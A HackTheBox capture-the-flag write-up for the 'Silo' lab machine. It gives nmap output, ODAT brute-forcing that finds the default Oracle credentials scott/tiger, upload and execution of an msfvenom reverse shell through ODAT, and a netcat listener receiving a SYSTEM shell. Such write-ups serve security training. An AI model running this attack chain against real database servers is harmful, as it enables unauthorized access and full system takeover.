HTB - Silo
Getting Root:
Used ODAT (Oracle Database Attacking Tool) to enumerate the Oracle database server
Uploaded reverse shell with ODAT and got system
Tools Used:
odat (Oracle Database Attacking Tool)
Nmap
nmap -sC -sV -p- -oA nmap/Silo 10.10.10.82
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 18:19 EDT
Nmap scan report for 10.10.10.82
Host is up (0.13s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m25s, deviation: 0s, median: 2m25s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-10T23:17:51
|_ start_date: 2020-03-10T22:20:22
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3377.71 seconds
Enumeration
HTTP
From the headers we can see its an IIS server running version 8.5 and using ASP
curl -I http://10.10.10.82
HTTP/1.1 200 OK
Content-Length: 701
Content-Type: text/html
Last-Modified: Wed, 03 Jan 2018 00:36:17 GMT
Accept-Ranges: bytes
ETag: '1114bde2a84d31:0'
"Server: Microsoft-IIS/8.5"
"X-Powered-By: ASP.NET"
Date: Tue, 10 Mar 2020 22:29:07 GMT
Oracle
nmap --script oracle-* 10.10.10.82 -p 1521
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 21:44 EDT
Nmap scan report for silo (10.10.10.82)
Host is up (0.10s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ XE
Nmap done: 1 IP address (1 host up) scanned in 235.94 seconds
Using ODAT
ODAT: Oracle Database Attacking Tool
Finding the SID
I did this with nmap ( see Enumeration above) but it can also be done with ODAT
Brute Forcing Creds
The GitHub repo has some default username and passwords files under a directory named accounts. The default file is accounts/accounts.txt
python3 odat.py passwordguesser -s 10.10.10.82 -d XE
odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
[+] Valid credentials found: scott/tiger. Continue...
100% |#######################################################################################################################################################################| Time: 00:17:00
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger
ODAT found: scott/tiger
Because I don't know much about oracle databases, I googled the term "Kali Linux enumerate oracle databases" and I was able to find this link which shows the default usernames and passwords on oracle databases.
# username and passwords from the website I found.
dbsnmp/dbsnmp
sys/change_on_install
pcms_sys/pcms_sys
wmsys/wmsys
outln/outln
scott/tiger
As you can see scott/tiger
are simply default creds.
Getting a Shell
Uploading the reverse shell I created with msfvenon
# odat utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\Temp" shellie.exe /root/HackTheBox/Silo/files/shellie.exe
[1] (10.10.10.82:1521): Put the /root/HackTheBox/Silo/files/shellie.exe local file in the C:\Temp folder like shellie.exe on the 10.10.10.82 server
[+] The /root/HackTheBox/Silo/files/shellie.exe file was created on the C:\Temp directory on the 10.10.10.82 server like the shellie.exe file
Executing the file
# odat externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:\Temp" shellie.exe
[1] (10.10.10.82:1521): Execute the shellie.exe command stored in the C:\Temp path
Got a shell as SYSTEM
# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
System Info
Host Name: SILO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00115-23036-AA976
Original Install Date: 12/31/2017, 11:01:23 PM
System Boot Time: 3/11/2020, 4:03:30 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 722 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,137 MB
Virtual Memory: In Use: 1,294 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 149 Hotfix(s) Installed.
[01]: KB2868626
[02]: KB2883200
[03]: KB2887595
[04]: KB2894852
[05]: KB2903939
[06]: KB2911106
[07]: KB2919355
[08]: KB2919394
[09]: KB2928680
[10]: KB2934520
[11]: KB2938066
[12]: KB2954879
[13]: KB2966826
[14]: KB2966828
[15]: KB2967917
[16]: KB2968296
[17]: KB2972103
[18]: KB2973114
[19]: KB2973351
[20]: KB2989930
[21]: KB3000850
[22]: KB3003057
[23]: KB3004361
[24]: KB3004365
[25]: KB3012702
[26]: KB3013172
[27]: KB3013791
[28]: KB3014442
[29]: KB3019978
[30]: KB3021910
[31]: KB3022777
[32]: KB3023219
[33]: KB3023266
[34]: KB3024751
[35]: KB3024755
[36]: KB3029603
[37]: KB3030377
[38]: KB3030947
[39]: KB3033446
[40]: KB3035126
[41]: KB3036612
[42]: KB3037576
[43]: KB3037924
[44]: KB3038002
[45]: KB3042085
[46]: KB3043812
[47]: KB3044374
[48]: KB3044673
[49]: KB3045634
[50]: KB3045685
[51]: KB3045717
[52]: KB3045719
[53]: KB3045755
[54]: KB3045992
[55]: KB3045999
[56]: KB3046017
[57]: KB3046737
[58]: KB3048043
[59]: KB3054169
[60]: KB3054203
[61]: KB3054256
[62]: KB3054464
[63]: KB3055323
[64]: KB3055343
[65]: KB3055642
[66]: KB3059317
[67]: KB3060681
[68]: KB3060793
[69]: KB3061512
[70]: KB3063843
[71]: KB3071756
[72]: KB3072307
[73]: KB3074228
[74]: KB3074545
[75]: KB3075220
[76]: KB3077715
[77]: KB3078405
[78]: KB3078676
[79]: KB3080042
[80]: KB3080149
[81]: KB3082089
[82]: KB3084135
[83]: KB3086255
[84]: KB3087041
[85]: KB3087137
[86]: KB3091297
[87]: KB3092601
[88]: KB3092627
[89]: KB3094486
[90]: KB3095701
[91]: KB3097992
[92]: KB3099834
[93]: KB3100473
[94]: KB3103616
[95]: KB3103696
[96]: KB3103709
[97]: KB3109103
[98]: KB3109976
[99]: KB3110329
[100]: KB3115224
[101]: KB3121261
[102]: KB3121461
[103]: KB3122651
[104]: KB3123245
[105]: KB3126033
[106]: KB3126434
[107]: KB3126587
[108]: KB3127222
[109]: KB3128650
[110]: KB3133043
[111]: KB3133690
[112]: KB3134179
[113]: KB3134815
[114]: KB3137728
[115]: KB3138602
[116]: KB3139164
[117]: KB3139398
[118]: KB3139914
[119]: KB3140219
[120]: KB3140234
[121]: KB3145384
[122]: KB3145432
[123]: KB3146604
[124]: KB3146723
[125]: KB3146751
[126]: KB3147071
[127]: KB3153704
[128]: KB3155784
[129]: KB3156059
[130]: KB3159398
[131]: KB3161949
[132]: KB3161958
[133]: KB3162343
[134]: KB3169704
[135]: KB3172614
[136]: KB3172729
[137]: KB3173424
[138]: KB3175024
[139]: KB3178539
[140]: KB3179574
[141]: KB3186539
[142]: KB4033369
[143]: KB4033428
[144]: KB4040972
[145]: KB4040974
[146]: KB4040981
[147]: KB4041777
[148]: KB4054854
[149]: KB4054519
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.82
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Last updated